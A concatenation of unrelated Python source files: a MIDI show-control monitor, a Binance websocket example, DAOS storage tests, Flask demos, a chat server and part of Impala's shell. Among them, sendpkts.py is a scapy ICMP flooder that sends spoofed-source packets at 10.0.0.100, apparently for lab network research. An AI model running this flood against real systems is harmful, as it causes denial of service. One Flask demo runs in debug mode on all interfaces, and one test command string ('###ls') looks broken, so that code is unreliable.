zip([0] + idx_list, idx_list + ([size] if idx_list[-1] != size else []))]
counter = 0
for i in res:
if i[-1] == 0:
i = i[:-1]
res[counter] = i
counter += 1
except:
res = [remaining_data]
try:
cue_number_data = res[0]
except:
cue_number_data = ""
try:
cue_list_data = res[1]
except:
cue_list_data = ""
try:
cue_path_data = res[2]
except:
cue_path_data = ""
cue_number_hex = ""
try:
if cue_number_data != "":
for i in cue_number_data:
cue_number_hex += hex(i)[2:]
cue_number_bytes = bytes.fromhex(cue_number_hex)
cue_number = cue_number_bytes.decode("ASCII")
else:
cue_number = ""
except:
cue_number = ""
cue_list_hex = ""
try:
if cue_list_data != "":
for i in cue_list_data:
cue_list_hex += hex(i)[2:]
cue_list_bytes = bytes.fromhex(cue_list_hex)
cue_list = cue_list_bytes.decode("ASCII")
else:
cue_list = ""
except:
cue_list = ""
cue_path_hex = ""
try:
if cue_path_data != "":
for i in cue_path_data:
cue_path_hex += hex(i)[2:]
cue_path_bytes = bytes.fromhex(cue_path_hex)
cue_path = cue_path_bytes.decode("ASCII")
else:
cue_path = ""
except:
cue_path = ""
current_time = datetime.now()
timestamp_str = current_time.strftime("%d-%b-%Y (%H:%M:%S)")
msg_to_snd = timestamp_str + ": Device ID:" + Device_ID + " Command Format:" + Command_Format + " Command Type:" + Command_Type + " Cue Number:" + cue_number + " Cue List:" + cue_list + " Cue Path:" + cue_path
pub.sendMessage('logUpdates', msg=msg_to_snd)
class MSCPrintoutGUI(wx.Frame):
def __init__(self):
super().__init__(parent=None, size=(900, 300), title="MSC Monitor")
panel = wx.Panel(self)
panel_sizer = wx.BoxSizer(wx.VERTICAL)
Listener_Text = wx.StaticText(panel, label="Select Interface:", style=wx.ALIGN_CENTER)
panel_sizer.Add(Listener_Text, 0, wx.ALL | wx.EXPAND, 5)
interface_sizer = wx.BoxSizer(wx.HORIZONTAL)
panel_sizer.Add(interface_sizer, 0, wx.ALL | wx.EXPAND, 5)
self.Refresh_Interfaces = wx.Button(panel, -1, "Refresh Interfaces")
interface_sizer.Add(self.Refresh_Interfaces, 0, wx.ALL | wx.EXPAND, 5)
self.Midi_Selector = wx.Choice(panel)
interface_sizer.Add(self.Midi_Selector, 1, wx.ALL | wx.EXPAND, 5)
self.Msg_Panel = wx.TextCtrl(panel, size=(-1, 150), style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_DONTWRAP)
panel_sizer.Add(self.Msg_Panel, 1, wx.ALL | wx.EXPAND, 5)
Clear_Contents = wx.Button(panel, -1, "Clear MSC Log")
panel_sizer.Add(Clear_Contents, 0, wx.ALL | wx.EXPAND, 5)
panel.SetSizer(panel_sizer)
self.Show()
self.Processor = MSCPrintout()
self.Bind(wx.EVT_CHOICE, self.UpdateInterface)
self.Bind(wx.EVT_BUTTON, self.OnClicked)
self.Bind(wx.EVT_CLOSE, self.QuitApp)
pub.subscribe(self.Add_Msg, 'logUpdates')
pub.subscribe(self.Add_Choices, 'availablePorts')
self.midi_choices = None
menubar = wx.MenuBar()
wx.MenuBar.MacSetCommonMenuBar(menubar)
def Add_Msg(self, msg):
current_lines = self.Msg_Panel.GetNumberOfLines()
if current_lines <= 1000:
wx.CallAfter(self.Msg_Panel.AppendText, msg + "\n")
else:
#wx.CallAfter(self.Msg_Panel.Remove, 0, self.Msg_Panel.GetLineLength(0) + 1)
#This remove line is too process intensive. Can it be optimized?
#Hacky solution for now:
wx.CallAfter(self.Msg_Panel.Clear)
wx.CallAfter(self.Msg_Panel.AppendText, msg + "\n")
def Add_Choices(self, choices):
self.Midi_Selector.Clear()
self.Midi_Selector.Append("\n")
self.Midi_Selector.Append(choices)
self.midi_choices = [""] + choices
def UpdateInterface(self, event):
chosenPort = self.midi_choices[event.Selection]
pub.sendMessage('chosenPort', port_to_open=chosenPort)
def OnClicked(self, event):
btn = event.GetEventObject().GetLabel()
if btn == "Clear MSC Log":
wx.CallAfter(self.Msg_Panel.Clear)
elif btn == "Refresh Interfaces":
pub.sendMessage('refreshInterfaces')
def QuitApp(self, event):
print("Quitting App")
self.Destroy()
sys.exit()
if __name__ == "__main__":
multiprocessing.freeze_support()
app = wx.App()
frame = MSCPrintoutGUI()
app.MainLoop()
|
example_stream_everything.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_stream_everything.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`! https://pypi.org/project/python-binance/#description")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
pass
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
binance_websocket_api_manager.create_stream(["!userData"], ["arr"], stream_label="userData stream")
binance_websocket_api_manager.create_stream(arr_channels, "arr", stream_label="arr channels")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
sendpkts.py
|
#!/usr/bin/env python3.7
#
# File: sendpkts.py
#
# Description : flooder script
# Created by : Quinn Burke (qkb5007@psu.edu)
# Date : November 2019
# Last Modified : November 2019
### Imports ###
from random import randint, shuffle
from scapy.all import IP, ICMP, Raw, send  # used by flood() below
import time
import threading
import sys
import numpy as np
import matplotlib.pyplot as plt
### Classes ###
class Flow():
def __init__(self, bytes_left=0, rate=0, duration=0, src_ip=None):
self.bytes_left = bytes_left
self.rate = rate
self.duration = duration
self.src_ip = src_ip
### Functions ###
def generateFlows(_sim_time, _client_rate):
num_flows = _sim_time * _client_rate
# See https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.random.pareto.html for generating samples with numpy pareto; specifically, using the formula below to obtain classical pareto from the pareto2/lomax dist
# generate sizes
xm1 = 10.0 # scale
a1 = 1.2 # shape
sizes = sorted((np.random.pareto(a1, num_flows) + 1) * xm1)
# generate durations
xm2 = 0.001
a2 = 1.5
durs = sorted((np.random.pareto(a2, num_flows) + 1) * xm2)
# sort/match to create flows
flows = [None]*num_flows
used_ips = list()
for i in range(num_flows):
src_ip = "10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(randint(12, 99)))
while src_ip in used_ips:
src_ip = "10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(randint(12, 99)))
used_ips.append(src_ip)
flows[i] = Flow(sizes[i], sizes[i]/durs[i], durs[i], src_ip)
gr = plt.GridSpec(1, 7, wspace=0.4, hspace=0.3)
cdf_sz = calc_cdf_fast(sizes)
plt.subplot(gr[:, :3])
plt.xlabel('Flow size (B)')
plt.ylabel('Cumulative Probability')
plt.title('Flow Sizes')
plt.plot(sizes, cdf_sz, color='green')
cdf_durs = calc_cdf_fast(durs)
plt.subplot(gr[:, 4:])
plt.xlabel('Durations (s)')
plt.ylabel('Cumulative Probability')
plt.title('Flow Durations')
plt.plot(durs, cdf_durs, color='red')
plt.show()
return flows
def calc_cdf_fast(arr):
cdf = []
for val in arr:
count = 0
for other_val in arr:
if other_val <= val:
count += 1
cdf.append(float(count*1.0/len(arr)))
return cdf
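# Note: calc_cdf_fast is O(n^2); the arrays passed to it above are already sorted,
# so (for distinct values) an equivalent one-liner would be
#     cdf = [(i + 1) / len(arr) for i in range(len(arr))]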
# def flood(_flows, flooder_idx):
def flood(_sim_time, _client_rate, _flows, _collection_interval):
# print("flows: ", _flows, "\nflooder_idx: ", flooder_idx)
# for i in range(1000):
# # print("[Flooder %d]: sending packets toward target 10.0.0.100..." %
# # flooder_idx)
# print("[Flooder]: sending packets toward target 10.0.0.100...")
# # pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(
# # randint(0, 255)), str(randint(12, 99))), dst="10.0.0.100")/ICMP()
# pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(
# randint(12, 99))), dst="10.0.0.100")/ICMP()/Raw(load='0'*1472) # max load is size 1472 because of 28 bytes ICMP packet, so everything can fit into 1500 MTU
# print(pkt.summary(), "(len: ", len(pkt), ")")
# # send(pkt, count=10, inter=0.1, iface="uph-eth0")
# send(pkt, count=1000000, iface="uph-eth0")
active_flows = list()
shuffle(_flows) # shuffle them randomly
for i in range(_sim_time):
# add new flows to active_flows list
        for _ in range(_client_rate):
            # do this before updating existing flows (as opposed to the simulator's order) so we don't have to update separately
            # add _client_rate flows to the active list so we can update activity below
            active_flows.append(_flows.pop())
# update existing flows
total_send_bytes = 0
        for flow in list(active_flows):  # iterate over a copy since flows are removed while looping
if flow.duration == 0: # from ~line 563 in Simulator.java
active_flows.remove(flow) # just remove (removed first in the simulator but we do it here)
elif flow.duration <= (1.0/_collection_interval):
total_send_bytes += flow.bytes_left # dump rest of bytes
flow.bytes_left = 0 # update these to get removed next iteration
flow.duration = 0
elif flow.duration > (1.0/_collection_interval):
if flow.bytes_left == 0: # line 617 (constant average rate)
active_flows.remove(flow)
elif flow.bytes_left <= flow.rate:
total_send_bytes += flow.bytes_left # dump rest of bytes
flow.bytes_left = 0 # update these to get removed next iteration
flow.duration = 0
elif flow.bytes_left > flow.rate:
total_send_bytes += flow.rate # dump rest of bytes
flow.bytes_left -= flow.rate
flow.duration -= (1.0/_collection_interval) # 1s collection interv granularity currently
                else:
active_flows.remove(flow) # just remove (?)
else:
active_flows.remove(flow) # just remove (?)
# send the flows toward the edge switch (ups) connecting to the servers (h1-h10)
# do we want to update the flows then send, or do we want to update the flows and send at the same time above? We want to send with respect to each source so aggregating them here with total_send_bytes may not be the correct way;
print("[Flooder]: sending packets toward target 10.0.0.100...")
pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(
randint(12, 99))), dst="10.0.0.100")/ICMP()/Raw(load='0'*1472) # 1500 byte MTU
print(pkt.summary(), "(len: ", len(pkt), ")")
# send(pkt, count=10, inter=0.1, iface="uph-eth0")
send(pkt, count=1000000, iface="uph-eth0")
time.sleep(1)
if __name__ == '__main__':
# start = time.time_ns()
# f = [0]*1800000
# for i in range(1800000):
# f[i] = i
# print("elapsed: ", str((time.time_ns()-start)/1e9), "s")
# print("len: ", str(len(f)))
# # print("f: ", f)
# exit(0)
# Note: only one server known to flooders "10.0.0.100"
sim_time = 180 # in seconds
client_rate = 10 # new incoming flows per second
collection_interval = 1.0
flows = generateFlows(sim_time, client_rate)
# num_flooders = 1
# nf = len(flows)/num_flooders # evenly divide flows for each flooder
# flooders = [None]*num_flooders
# for i in range(num_flooders):
# flooders[i] = threading.Thread(
# target=flood, args=(flows[int(i*nf):int((i+1)*nf)], i))
# flooders[i].start()
# # wait for flooders to finish
# for i in range(num_flooders):
# flooders[i].join()
flood(sim_time, client_rate, flows, collection_interval)
|
parallel_io.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import threading
import subprocess #nosec
import time
from getpass import getuser
import general_utils
from ClusterShell.NodeSet import NodeSet
from command_utils import CommandFailure
from fio_test_base import FioBase
from ior_test_base import IorTestBase
# pylint: disable=too-many-ancestors
class ParallelIo(FioBase, IorTestBase):
"""Base Parallel IO test class.
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a ParallelIo object."""
super().__init__(*args, **kwargs)
self.dfuse = None
self.cont_count = None
self.pool_count = None
self.statvfs_info_initial = None
self.statvfs_before_cont_destroy = None
self.statvfs_after_cont_destroy = None
self.pool = []
self.container = []
def create_pool(self):
"""Create a TestPool object to use with ior."""
self.pool.append(self.get_pool(connect=False))
# pylint: disable=arguments-differ
def create_cont(self, pool):
"""Create a TestContainer object to be used to create container.
Args:
pool (TestPool): TestPool object type for which container
needs to be created
"""
self.container.append(self.get_container(pool))
def stat_bfree(self, path):
"""Get stat bfree.
Args:
path (str): path to get free block size of.
Returns:
int: value of stat free blocks
"""
cmd = ["ssh", "{}@{}".format(getuser(), self.hostlist_clients[0]),
"stat -c%a -f {}".format(path)]
try:
result = subprocess.check_output(cmd)
except subprocess.CalledProcessError as err:
self.fail("Get free block size method failed with: {}".format(err))
return int(result)
def statvfs_pool(self, path):
"""Obtain the free space for the pool using statvfs.
Args:
path (str): path for which free space needs to be obtained.
Returns:
list: list of free space info for each pool supplied in pool_obj.
"""
statvfs_list = []
for _, pool in enumerate(self.pool):
dfuse_pool_dir = str(path + "/" + pool.uuid)
statvfs_info = self.stat_bfree(dfuse_pool_dir)
statvfs_list.append(statvfs_info)
self.log.info("Statvfs List Output: %s", statvfs_list)
return statvfs_list
def verify_aggregation(self, reduced_space, count):
"""Verify aggregation.
Verify if expected space is returned for each pool after containers
were destroyed. If not, wait for 60 secs and check again. Wait 4 times,
otherwise exit the test with a failure.
Args:
reduced_space (int): expected space to be returned
count (int): aggregation index
"""
counter = 1
while (self.statvfs_after_cont_destroy[count] <
self.statvfs_before_cont_destroy[count] + reduced_space):
# try to wait for 4 x 60 secs for aggregation to be completed
# or else exit the test with a failure.
if counter > 4:
self.log.info("Free space before io: %s",
self.statvfs_info_initial)
self.log.info("Free space after io: %s",
self.statvfs_before_cont_destroy)
self.log.info("Free space at test termination: %s",
self.statvfs_after_cont_destroy)
self.fail("Aggregation did not complete as expected")
time.sleep(60)
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
counter += 1
def test_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to mount dfuse and verify multiple
containers using fio.
Use cases:
Mount dfuse using pool uuid.
Create multiple containers under that dfuse mount point.
Check those containers are accessible from that mount point.
Perform io to those containers using FIO
Delete one of the containers
Check if dfuse is still running. If not, fail the test and exit.
Otherwise, try accessing the deleted container.
This should fail.
Check dfuse again.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,tx,dfuse
:avocado: tags=parallelio
"""
# get test params for cont and pool count
self.cont_count = self.params.get("cont_count", '/run/container/*')
threads = []
# Create a pool and start dfuse.
self.create_pool()
self.start_dfuse(self.hostlist_clients, self.pool[0], None)
# create multiple containers
for _ in range(self.cont_count):
self.create_cont(self.pool[0])
# check if all the created containers can be accessed and perform
# io on each container using fio in parallel
for _, cont in enumerate(self.container):
dfuse_cont_dir = self.dfuse.mount_dir.value + "/" + cont.uuid
cmd = "ls -a {}".format(dfuse_cont_dir)
try:
# execute bash cmds
ret_code = general_utils.pcmd(
self.hostlist_clients, cmd, timeout=30)
if 0 not in ret_code:
error_hosts = NodeSet(
",".join(
[str(node_set) for code, node_set in
list(ret_code.items()) if code != 0]))
raise CommandFailure(
"Error running '{}' on the following "
"hosts: {}".format(cmd, error_hosts))
# report error if any command fails
except CommandFailure as error:
self.log.error("ParallelIo Test Failed: %s",
str(error))
self.fail("Test was expected to pass but "
"it failed.\n")
# run fio on all containers
thread = threading.Thread(target=self.execute_fio, args=(
self.dfuse.mount_dir.value + "/" + cont.uuid, False))
threads.append(thread)
thread.start()
# wait for all fio jobs to be finished
for job in threads:
job.join()
# destroy first container
container_to_destroy = self.container[0].uuid
self.container[0].destroy(1)
# check dfuse if it is running fine
self.dfuse.check_running()
# try accessing destroyed container, it should fail
try:
self.execute_fio(
self.dfuse.mount_dir.value + "/" + container_to_destroy, False)
self.fail(
"Fio was able to access destroyed container: {}".format(
self.container[0].uuid))
except CommandFailure as error:
self.log.info("Fio on the destroyed container failed as expected: %s", error)
# check dfuse is still running after attempting to access deleted
# container.
self.dfuse.check_running()
def test_multipool_parallelio(self):
"""Jira ID: DAOS-3775.
Test Description:
Purpose of this test is to verify aggregation across multiple
pools and containers.
Use cases:
Create 10 pools
Create 10 containers under each pool.
Record statvfs free space for each pool.
Perform parallel io to each pool without deleting the file
after write.
Record free space using statvfs after write.
Delete half of the containers from each pool.
Calculate the expected amount of data to be deleted when
containers are destroyed.
Record free space after container destroy.
Loop until either the all space is returned back after aggregation
completion or exit the loop after trying for 240 secs of wait and
fail the test.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=daosio,dfuse
:avocado: tags=multipoolparallelio
"""
# test params
threads = []
pool_threads = []
cont_threads = []
self.pool_count = self.params.get("pool_count", '/run/pool/*')
self.cont_count = self.params.get("cont_count", '/run/container/*')
processes = self.params.get("np", '/run/ior/client_processes/*')
# Create pools in parallel.
for _ in range(self.pool_count):
pool_thread = threading.Thread(target=self.create_pool)
pool_threads.append(pool_thread)
pool_thread.start()
# wait for pool create to finish
for pool_job in pool_threads:
pool_job.join()
# start dfuse.
self.start_dfuse(self.hostlist_clients, None, None)
# record free space using statvfs before any data is written.
self.statvfs_info_initial = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Create 10 containers for each pool. Container creation cannot be
# parallelised, as different container creates could complete at
# different times and get appended to the self.container list out of
# order, causing problems during the write process.
for _, pool in enumerate(self.pool):
for _ in range(self.cont_count):
self.create_cont(pool)
# Try to access each dfuse mounted container using ls. Once it is
# accessed successfully, go ahead and perform io on that location
# using ior. This process of performing io is done in parallel for
# all containers using threads.
for pool_count, pool in enumerate(self.pool):
dfuse_pool_dir = str(self.dfuse.mount_dir.value + "/" + pool.uuid)
for counter in range(self.cont_count):
cont_num = (pool_count * self.cont_count) + counter
dfuse_cont_dir = str(dfuse_pool_dir + "/" +
self.container[cont_num].uuid)
cmd = "###ls -a {}".format(dfuse_cont_dir)
self.execute_cmd(cmd)
# run ior on all containers
test_file = dfuse_cont_dir + "/testfile"
self.ior_cmd.test_file.update(test_file)
self.ior_cmd.set_daos_params(
self.server_group, pool, self.container[cont_num].uuid)
thread = threading.Thread(
target=self.run_ior,
args=(self.get_ior_job_manager_command(), processes, None,
False))
threads.append(thread)
thread.start()
# wait for all ior jobs to be finished
for job in threads:
job.join()
# Record free space after io
self.statvfs_before_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Destroy half of the containers from each pool
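# The containers were appended pool by pool, so walk the flat self.container list in
# pool-sized strides; each 'del' shifts the remaining entries left, which is why pfinal
# carries over as the start index of the next pool's containers. Note: the loop count
# assumes cont_count == pool_count (both 10 in this test).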
pfinal = 0
for count in range(self.cont_count):
pinitial = pfinal
pfinal = pinitial + (self.cont_count // 2)
del self.container[pinitial:pfinal]
for cont in self.container:
cont_thread = threading.Thread(target=cont.destroy)
cont_threads.append(cont_thread)
cont_thread.start()
for destroy_job in cont_threads:
destroy_job.join()
# Record free space after container destroy.
self.statvfs_after_cont_destroy = self.statvfs_pool(
self.dfuse.mount_dir.value)
# Calculate the expected space to be returned after containers
# are destroyed.
reduced_space = (self.cont_count *
int(self.ior_cmd.block_size.value))/2
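# Example with hypothetical values: cont_count = 10 and a 1 GiB IOR block size give
# reduced_space = 10 * 1 GiB / 2 = 5 GiB expected back per pool once aggregation of
# the destroyed containers completes.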
# Verify if expected space is returned for each pool after containers
# were destroyed. If not, wait for 60 secs and check again. Wait 4
# times, otherwise exit the test with a failure.
for count in range(self.pool_count):
thread = threading.Thread(
target=self.verify_aggregation,
args=(reduced_space, count))
threads.append(thread)
thread.start()
for job in threads:
job.join()
|
app.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li
:license: MIT, see LICENSE for more details.
"""
import os
from threading import Thread
import sendgrid
from sendgrid.helpers.mail import Email as SGEmail, Content, Mail as SGMail
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SubmitField
from wtforms.validators import DataRequired, Email
from flask import Flask, flash, redirect, url_for, render_template, request
app = Flask(__name__)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config.update(
SECRET_KEY=os.getenv('SECRET_KEY', 'secret string'),
MAIL_SERVER=os.getenv('MAIL_SERVER'),
MAIL_PORT=465,
MAIL_USE_SSL=True,
MAIL_USERNAME=os.getenv('MAIL_USERNAME'),
MAIL_PASSWORD=os.getenv('MAIL_PASSWORD'),
MAIL_DEFAULT_SENDER=('Grey Li', os.getenv('MAIL_USERNAME'))
)
mail = Mail(app)
# send over SMTP
def send_smtp_mail(subject, to, body):
message = Message(subject, recipients=[to], body=body)
mail.send(message)
# send over SendGrid Web API
def send_api_mail(subject, to, body):
sg = sendgrid.SendGridAPIClient(os.getenv('SENDGRID_API_KEY'))
from_email = SGEmail('Grey Li <noreply@helloflask.com>')
to_email = SGEmail(to)
content = Content("text/plain", body)
email = SGMail(from_email, subject, to_email, content)
sg.client.mail.send.post(request_body=email.get())
# send email asynchronously
def _send_async_mail(app, message):
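# Flask-Mail needs an application context to access the mail configuration; a
# background thread does not inherit the request's context, so push one explicitly.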
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, body):
# app = current_app._get_current_object() # if use factory (i.e. create_app()), get app like this
message = Message(subject, recipients=[to], body=body)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
# send email with HTML body
def send_subscribe_mail(subject, to, **kwargs):
message = Message(subject, recipients=[to], sender='Flask Weekly <%s>' % os.getenv('MAIL_USERNAME'))
message.body = render_template('emails/subscribe.txt', **kwargs)
message.html = render_template('emails/subscribe.html', **kwargs)
mail.send(message)
class EmailForm(FlaskForm):
to = StringField('To', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
body = TextAreaField('Body', validators=[DataRequired()])
submit_smtp = SubmitField('Send with SMTP')
submit_api = SubmitField('Send with SendGrid API')
submit_async = SubmitField('Send with SMTP asynchronously')
class SubscribeForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
submit = SubmitField('Subscribe')
@app.route('/', methods=['GET', 'POST'])
def index():
form = EmailForm()
if form.validate_on_submit():
to = form.to.data
subject = form.subject.data
body = form.body.data
if form.submit_smtp.data:
send_smtp_mail(subject, to, body)
method = request.form.get('submit_smtp')
elif form.submit_api.data:
send_api_mail(subject, to, body)
method = request.form.get('submit_api')
else:
send_async_mail(subject, to, body)
method = request.form.get('submit_async')
flash('Email sent %s! Check your inbox.' % ' '.join(method.split()[1:]))
return redirect(url_for('index'))
form.subject.data = 'Hello, World!'
form.body.data = 'Across the Great Wall we can reach every corner in the world.'
return render_template('index.html', form=form)
@app.route('/subscribe', methods=['GET', 'POST'])
def subscribe():
form = SubscribeForm()
if form.validate_on_submit():
name = form.name.data
email = form.email.data
send_subscribe_mail('Subscribe Success!', email, name=name)
flash('Confirmation email has been sent! Check your inbox.')
return redirect(url_for('subscribe'))
return render_template('subscribe.html', form=form)
@app.route('/unsubscribe')
def unsubscribe():
flash('Want to unsubscribe? No way...')
return redirect(url_for('subscribe'))
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
|
website.py
|
from flask import Flask, render_template, request
from main import BuildPipeline
from config import Config
from threading import Thread
app=Flask(__name__)
pipeline = None
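# Populated in the __main__ block below; the routes assume this module is run directly
# so that pipeline is a live BuildPipeline instance rather than None.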
@app.route('/')
def index():
print("Index!!")
return render_template("index.html")
@app.route('/service/', methods=["GET","POST"])
def registerService():
print("Add Service Called")
if request.form['action'] == "Add Service":
# call add service
print(request.form)
if request.form['parent'] == "":
print('Parent is None')
pipeline.addService(request.form['name'], Config.services[request.form['services']])
else:
pipeline.addService(request.form['name'], Config.services[request.form['services']], request.form['parent'])
else:  # request.form['action'] == "Remove Service"
# call removeService
pipeline.removeService(request.form['name'])
return render_template('index.html')
@app.route('/build/', methods=["GET","POST"])
def build():
thread = Thread(target=pipeline.buildPipeline, args=(), daemon=True)
thread.start()
# pipeline.buildPipeline()
return render_template("built.html")
@app.route('/pipeline/', methods=["GET","POST"])
def terminate():
thread = Thread(target=pipeline.terminatePipeline, args=(), daemon=True)
thread.start()
# pipeline.terminatePipeline()
return render_template("index.html")
if __name__ == "__main__":
pipeline = BuildPipeline()
app.run(debug=True)
|
server.py
|
import socket
import threading
# Connection Data
host = '127.0.0.1'
port = 3415
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
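# Per-client receive loop: relay every message to all connected clients; on any error
# (usually a disconnect), drop the client, announce the departure, and stop the thread.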
while True:
try:
# Broadcasting Messages
message = client.recv(1024)
broadcast(message)
except Exception as e:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} left!'.encode('utf-8'))
nicknames.remove(nickname)
break
def receive():
while True:
# Accept Connection
client, address = server.accept()
print(f"Connected with {str(address)}")
# Request And Store Nickname
client.send('NICK'.encode('utf-8'))
nickname = client.recv(1024).decode('utf-8')
nicknames.append(nickname)
clients.append(client)
print(f"Nickname is {nickname}")
broadcast(f"{nickname} joined!".encode('utf-8'))
client.send('Connected to server!'.encode('utf-8'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print("Server is listening")
receive()
|
impala_shell.py
|
#!/usr/bin/env python
# Copyright 2012 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Impala's shell
import cmd
import csv
import getpass
import prettytable
import os
import signal
import socket
import sqlparse
import sys
import threading
import time
from optparse import OptionParser
from Queue import Queue, Empty
from beeswaxd import BeeswaxService
from beeswaxd.BeeswaxService import QueryState
from ImpalaService import ImpalaService
from ImpalaService.ImpalaService import TImpalaQueryOptions, TResetTableReq
from ImpalaService.ImpalaService import TPingImpalaServiceResp
from Status.ttypes import TStatus, TStatusCode
from thrift.transport.TSocket import TSocket
from thrift.transport.TTransport import TBufferedTransport, TTransportException
from thrift.protocol import TBinaryProtocol
from thrift.Thrift import TApplicationException
VERSION_FORMAT = "Impala Shell v%(version)s (%(git_hash)s) built on %(build_date)s"
COMMENT_TOKEN = '--'
VERSION_STRING = "build version not available"
HISTORY_LENGTH = 100
# Tarball / packaging build makes impala_build_version available
try:
from impala_build_version import get_git_hash, get_build_date, get_version
VERSION_STRING = VERSION_FORMAT % {'version': get_version(),
'git_hash': get_git_hash()[:7],
'build_date': get_build_date()}
except Exception:
pass
class RpcStatus:
"""Convenience enum to describe Rpc return statuses"""
OK = 0
ERROR = 1
class OutputWriter(object):
"""Helper class for saving result set output to a file"""
def __init__(self, file_name, field_delim):
# The default csv field size limit is too small to write large result sets. Set it to
# an arbitrarily large value.
csv.field_size_limit(sys.maxint)
self.file_name = file_name
if not field_delim:
raise ValueError, 'A field delimiter is required to output results to a file'
self.field_delim = field_delim.decode('string-escape')
if len(self.field_delim) != 1:
raise ValueError, 'Field delimiter must be a 1-character string'
def write_rows(self, rows, mode='ab'):
output_file = None
try:
output_file = open(self.file_name, mode)
writer =\
csv.writer(output_file, delimiter=self.field_delim, quoting=csv.QUOTE_MINIMAL)
